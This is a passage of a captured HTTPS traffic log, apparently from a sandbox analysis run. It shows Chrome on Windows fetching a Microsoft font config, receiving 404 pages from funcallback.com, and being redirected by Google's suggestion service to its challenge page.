                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: identity
                                                                                                                                      If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                      Range: bytes=0-2147483646
                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                      Host: fs.microsoft.com
                                                                                                                                      2024-04-24 10:12:39 UTC531INHTTP/1.1 200 OK
                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                      ApiVersion: Distribute 1.1
                                                                                                                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                      X-Azure-Ref: 0Fz4RYwAAAACZW8dCTzveR7lI76J6Z2l5U0pDRURHRTA1MTgAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm
                                                                                                                                      Cache-Control: public, max-age=247813
                                                                                                                                      Date: Wed, 24 Apr 2024 10:12:39 GMT
                                                                                                                                      Content-Length: 55
                                                                                                                                      Connection: close
                                                                                                                                      X-CID: 2
                                                                                                                                      2024-04-24 10:12:39 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                      Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      10192.168.2.164971531.41.44.1094437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:12:40 UTC658OUTGET / HTTP/1.1
                                                                                                                                      Host: funcallback.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                      Sec-Fetch-User: ?1
                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:12:41 UTC273INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Wed, 24 Apr 2024 10:12:40 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Content-Length: 147
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                      Expires: Wed, 24 Apr 2024 10:12:40 GMT
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      2024-04-24 10:12:41 UTC147INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      11192.168.2.1649725142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:12:41 UTC613OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:12:42 UTC2172INHTTP/1.1 302 Found
                                                                                                                                      Location: https://www.google.com/sorry/index?continue=https://www.google.com/complete/search%3Fclient%3Dchrome-omni%26gs_ri%3Dchrome-ext-ansg%26xssi%3Dt%26q%3D%26oit%3D0%26gs_rn%3D42%26sugkey%3DAIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw&q=EgSaEGkkGJq2o7EGIjD7Hp-C9018GWaRUNvZXpEQIFQkfHTNoatWKeY2OmK88bNl6MtErHALgHC7FUXnokQyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                                                      x-hallmonitor-challenge: CgwImrajsQYQrcWRiAISBJoQaSQ
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce--tbg53P7AEpmHAeTgeNxRg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                      Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                                                      Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                      Date: Wed, 24 Apr 2024 10:12:42 GMT
                                                                                                                                      Server: gws
                                                                                                                                      Content-Length: 554
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      Set-Cookie: 1P_JAR=2024-04-24-10; expires=Fri, 24-May-2024 10:12:42 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                                                                                      Set-Cookie: NID=513=oODCzz_0gTUbCIrhvLZhplhywAZD8mxfbg70Pz8O4QaUpliIW0YDXPjUMbyCxC4Yi2PMyBSNyVcTex-Vb93d0wV64PqVY_7UrrYY0K6htUy_s1A4Xo8mr4dgY1yMaxn6gMXlhtc2NgduJcPwGbFTDb4ijQySG75_gry2A7S3GMQ; expires=Thu, 24-Oct-2024 10:12:42 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close
                                                                                                                                      2024-04-24 10:12:42 UTC554INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 63 6f 6d 70 6c 65 74 65 2f 73 65 61 72 63 68 25 33 46 63 6c
                                                                                                                                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/complete/search%3Fcl


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      12192.168.2.164972831.41.44.1094437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:12:46 UTC662OUTGET /home HTTP/1.1
                                                                                                                                      Host: funcallback.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                      Sec-Fetch-User: ?1
                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:12:47 UTC273INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Wed, 24 Apr 2024 10:12:47 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Content-Length: 147
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                      Expires: Wed, 24 Apr 2024 10:12:47 GMT
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      2024-04-24 10:12:47 UTC147INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      13192.168.2.1649729142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:12:59 UTC613OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:00 UTC2171INHTTP/1.1 302 Found
                                                                                                                                      Location: https://www.google.com/sorry/index?continue=https://www.google.com/complete/search%3Fclient%3Dchrome-omni%26gs_ri%3Dchrome-ext-ansg%26xssi%3Dt%26q%3D%26oit%3D0%26gs_rn%3D42%26sugkey%3DAIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw&q=EgSaEGkkGKu2o7EGIjAHapbwJWFN81vbrTVHxih3IxRnJnlsIfGDHytyY_qFMz8PDPkJxODMm7YzS8pcVpcyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                                                      x-hallmonitor-challenge: CgsIrLajsQYQ8t_wLBIEmhBpJA
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-h_M2FLEmQP6Q5Z0zWjtj9A' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                      Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                                                      Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                      Date: Wed, 24 Apr 2024 10:13:00 GMT
                                                                                                                                      Server: gws
                                                                                                                                      Content-Length: 554
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      Set-Cookie: 1P_JAR=2024-04-24-10; expires=Fri, 24-May-2024 10:13:00 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                                                                                      Set-Cookie: NID=513=PVlEra_Pw78cItFuhr0n5iXqP92SDaVvH80SUYrGSuNUPRf36shAJ1Oqz0mhpYpS8-7QsWntx-vyPwgUYJ3KqnuiWYEZ8PgKIxaigCJ08EnkwymQrwECdyy1x55d5-l613slSx2nmrs4iMTz1Wxm6OawLw136XvhA1SB99xsdYA; expires=Thu, 24-Oct-2024 10:12:59 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close
                                                                                                                                      2024-04-24 10:13:00 UTC554INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 63 6f 6d 70 6c 65 74 65 2f 73 65 61 72 63 68 25 33 46 63 6c
                                                                                                                                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/complete/search%3Fcl


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      14192.168.2.1649730142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:00 UTC815OUTGET /sorry/index?continue=https://www.google.com/complete/search%3Fclient%3Dchrome-omni%26gs_ri%3Dchrome-ext-ansg%26xssi%3Dt%26q%3D%26oit%3D0%26gs_rn%3D42%26sugkey%3DAIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw&q=EgSaEGkkGKu2o7EGIjAHapbwJWFN81vbrTVHxih3IxRnJnlsIfGDHytyY_qFMz8PDPkJxODMm7YzS8pcVpcyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      15192.168.2.164972731.41.44.1094437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:00 UTC688OUTGET /home HTTP/1.1
                                                                                                                                      Host: funcallback.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Cache-Control: max-age=0
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                      Sec-Fetch-User: ?1
                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:00 UTC273INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Wed, 24 Apr 2024 10:13:00 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Content-Length: 147
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                      Expires: Wed, 24 Apr 2024 10:13:00 GMT
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      2024-04-24 10:13:00 UTC147INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      16192.168.2.1649732142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:06 UTC613OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:07 UTC2172INHTTP/1.1 302 Found
                                                                                                                                      Location: https://www.google.com/sorry/index?continue=https://www.google.com/complete/search%3Fclient%3Dchrome-omni%26gs_ri%3Dchrome-ext-ansg%26xssi%3Dt%26q%3D%26oit%3D0%26gs_rn%3D42%26sugkey%3DAIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw&q=EgSaEGkkGLK2o7EGIjDBU0s2EL0m-ZFYqqmUzzLbX6x4Pg_8hNGfTIKZxg0A9AUu5GzanTvUY_37OzRhrokyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                                                      x-hallmonitor-challenge: CgwIsrajsQYQ85TzxwMSBJoQaSQ
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-lfWulivJcgcZX8Kp4XtW9g' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                      Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                                                      Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                      Date: Wed, 24 Apr 2024 10:13:06 GMT
                                                                                                                                      Server: gws
                                                                                                                                      Content-Length: 554
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      Set-Cookie: 1P_JAR=2024-04-24-10; expires=Fri, 24-May-2024 10:13:06 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                                                                                      Set-Cookie: NID=513=Y_FvQC2Uvq7WHpoWgta8vnvit7ouZpDvH4MiGRJpYCgqomsRFQgAbhDY3Yg2Cz1TvJfytnY8OHiYxJRs-nw0aNnHNCJYdysw1awTiqm0rZD9UeBhW6M6Z4gaS9zYSEnu6ZJAWzw7S4PTlULuiZsypp3qIlfdg5wbIj2FbiNPiaA; expires=Thu, 24-Oct-2024 10:13:06 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close
